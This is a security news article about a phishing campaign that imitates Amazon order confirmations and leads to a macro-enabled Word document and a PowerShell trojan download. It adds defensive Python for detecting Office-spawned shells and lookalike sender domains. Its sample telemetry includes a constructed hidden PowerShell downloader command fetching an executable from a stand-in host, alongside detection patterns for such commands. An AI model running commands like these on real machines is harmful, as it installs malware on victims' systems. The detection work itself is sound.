Cybercriminals are always on the lookout for ways to exploit people's rush to get things done, including those last-minute online purchases that still need to be delivered or paid for.
With an increasing number of us doing most of our shopping online, threat actors are seizing the opportunity to run email spam campaigns that impersonate popular retailers and delivery companies such as Amazon.
Cybersecurity firm EdgeWare has uncovered a well-disguised email campaign masquerading as Amazon order confirmations.
When a user opens one of these emails, they are shown an order confirmation stating that their package has shipped. No actual order information is visible, however: neither what the item is nor to whom it is addressed. To get that information, the email directs the user to click 'Order Details'.
Unfortunately, this is where the trouble begins. According to EdgeWare: “Clicking Order Details connects to a unique subdirectory at lancang.desa.id and downloads a Microsoft Word document titled order_details.doc. Opening this document activates a macro that contacts palapa2.lazeon.com at IP 101.50.1.12 (the same server that hosts lancang.desa.id, located in Indonesia).”
Once this chain starts, the system is exposed to the installation of further malicious software.
Amazon Email Scam
Clicking Order Details can also open a Microsoft Office document that asks the user to enable content. Doing so triggers a PowerShell command that silently downloads a banking Trojan to the device.
PowerShell is a scripting language and command shell built into Windows. A macro-launched PowerShell process runs with the current user's privileges, but that is enough to reach the Windows and .NET APIs, fetch and execute further payloads from the internet, and do so with very little on-disk footprint, which is why threat actors favour it.
Fred O'Connor, a researcher at endpoint security company Cybereason, commented in a blog post that: “PowerShell's ability to run remotely through WinRM makes it an even more appealing tool. This feature enables attackers to get through Windows Firewall, run PowerShell scripts remotely or simply drop into an interactive PowerShell session, providing complete admin control over an endpoint.”
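The hop from a Word macro to a PowerShell downloader is also where defenders get their best detection opportunity: on an ordinary workstation, WINWORD.EXE has no business spawning powershell.exe, and the downloader's command line usually carries tell-tale switches (hidden window, no profile, execution-policy bypass, encoded command, WebClient download). The following Python is an added example written for this article, not EdgeWare's or Cybereason's code, and it runs offline over constructed process-creation records in a simple key="value" format modelled loosely on Sysmon Event ID 1. The sample command lines and the encoded-command blob are constructed for illustration and are not real payloads.

```python
import re
from dataclasses import dataclass, field

# Office applications that should never spawn a shell on a normal workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and shells a macro typically launches.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line fragments that, combined with the parent/child pair above,
# describe a macro-launched downloader. Matched case-insensitively.
SUSPICIOUS_ARGS = [
    r"-e(nc(odedcommand)?)?\b",        # -e / -enc / -EncodedCommand
    r"downloadfile|downloadstring",    # System.Net.WebClient fetch
    r"invoke-expression|\biex\b",      # execute what was fetched
    r"-w(indowstyle)?\s+hidden",       # keep the console window off-screen
    r"-nop\b|-noprofile",              # skip the user's profile script
    r"bypass",                         # -ExecutionPolicy Bypass
    r"https?://",                      # a URL on the command line
]

# Constructed sample records (assumed format, not real telemetry).
SAMPLE_EVENTS = [
    'EventID="1" ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc UABsAGEAYwBlAGgAbwBsAGQAZQBy"',
    'EventID="1" ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -nop -w hidden (New-Object Net.WebClient).DownloadFile(\'http://example.invalid/x.exe\',$env:TEMP+\'\\x.exe\')"',
    # Benign: an administrator running PowerShell from Explorer.
    'EventID="1" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe Get-ChildItem"',
    # Benign: Word spawning the print spooler helper, not a shell.
    'EventID="1" ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'Image="C:\\Windows\\splwow64.exe" CommandLine="C:\\Windows\\splwow64.exe 12288"',
]


@dataclass
class Alert:
    line_no: int
    parent: str
    child: str
    reasons: list = field(default_factory=list)


def parse_event(line):
    """Parse key="value" pairs from one record into a dict."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(lines):
    """Return an Alert for every record where an Office app spawned a shell.

    The parent/child pair alone fires the rule; each matching command-line
    pattern is appended as an extra reason so analysts can rank alerts.
    """
    alerts = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        if parent not in OFFICE_PARENTS or child not in SHELLS:
            continue
        cmd = ev.get("CommandLine", "").lower()
        reasons = ["office_parent_spawned_shell"]
        reasons += [p for p in SUSPICIOUS_ARGS if re.search(p, cmd)]
        alerts.append(Alert(n, parent, child, reasons))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"record {a.line_no}: {a.parent} -> {a.child}: {', '.join(a.reasons)}")
```

The parent/child check is the robust part of this rule: attackers can rename switches, obfuscate strings or stage through cmd.exe, but a macro still has to create a process, and the Office application remains its parent. The command-line patterns are there to raise confidence and to give an analyst something to read, not to gate the alert.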
To avoid being caught out by campaigns like this, users must be vigilant about what they open, especially an unexpected Microsoft Word attachment, and should not click 'Enable Content' in a document that arrived by email: that prompt is what hands control to the macro.
A genuine order confirmation includes your name and other identifying details, such as the item ordered and the delivery address. Be wary of anything vague enough to have been sent out en masse. We read sender and link addresses passively, paying little attention to spelling, yet a misspelled or slightly altered address is a key indicator that something is amiss and is worth checking for.
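The "check the spelling of the address" advice generalises to a few mechanical checks a mail filter or a careful reader can apply to the From header: is the registrable domain one the brand actually uses, is the brand name being used as a subdomain or label of some other domain (amazon.com.track-ship.id), is the domain a one- or two-character misspelling (amaz0n.com), and does the display name claim a brand the domain does not back up. The Python below is an added example for this article, not code from EdgeWare or Amazon. The trusted-domain list, brand word and sample headers are constructed, and the registrable-domain helper is a deliberate simplification: a production implementation would consult the Public Suffix List instead.

```python
import re

# Constructed list of domains the brand is assumed to send from.
TRUSTED_DOMAINS = {"amazon.com", "amazon.co.uk", "amazon.de"}
BRAND_WORDS = {"amazon"}

# Second-level labels that commonly sit under a two-letter country code.
CC_SECOND_LEVEL = {"co", "com", "org", "net", "ac", "gov"}


def parse_from(header):
    """Split a From header into (display_name, domain); domain is lower-cased."""
    m = re.match(r'\s*(.*?)\s*<([^<>@\s]+)@([^<>\s]+)>\s*$', header)
    if m:
        display = m.group(1).strip().strip('"')
        domain = m.group(3)
    else:
        m = re.search(r"([^\s<>@]+)@([^\s<>]+)", header)
        if not m:
            return "", None
        display, domain = "", m.group(2)
    return display, domain.strip().lower().rstrip(".")


def registrable(domain):
    """Simplified registrable domain (assumption: last two labels, or three
    when the second-last is a ccSLD such as the 'co' in amazon.co.uk)."""
    labels = domain.split(".")
    if len(labels) >= 3 and labels[-2] in CC_SECOND_LEVEL and len(labels[-1]) == 2:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Levenshtein distance; used to catch one- or two-character misspellings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def classify(header):
    """Return 'trusted', 'lookalike', 'unrelated' or 'unparseable'."""
    display, domain = parse_from(header)
    if domain is None:
        return "unparseable"
    reg = registrable(domain)
    if reg in TRUSTED_DOMAINS:
        return "trusted"
    labels = domain.split(".")
    # Brand name used as a subdomain, or embedded in the registrable label.
    if any(w in labels or w in reg.split(".")[0] for w in BRAND_WORDS):
        return "lookalike"
    # Display name claims the brand while the domain does not.
    if any(w in display.lower() for w in BRAND_WORDS):
        return "lookalike"
    # Domain within two edits of a trusted one (amaz0n.com, amazom.com).
    if any(edit_distance(reg, t) <= 2 for t in TRUSTED_DOMAINS):
        return "lookalike"
    return "unrelated"


# Constructed sample headers; none is taken from a real message.
SAMPLE_HEADERS = [
    "Amazon.com <ship-confirm@amazon.com>",
    "ship-confirm@amazon.co.uk",
    "order-update@amazon.com.track-ship.id",
    "Amazon <no-reply@amaz0n.com>",
    "Shipping <update@amazon-orders.net>",
    '"Amazon.com" <noreply@mail-service.id>',
    "Weekly News <newsletter@example.org>",
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(f"{classify(h):11} {h}")
```

Note the order of the checks: the exact registrable-domain match comes first so that a legitimate sender is never marked a lookalike, and the display-name test comes before the edit-distance test because a spoofed display name is a stronger signal than spelling similarity. The domain in the From header can itself be forged, so this is a triage aid for the reader and for a filter, not a substitute for SPF, DKIM and DMARC checks.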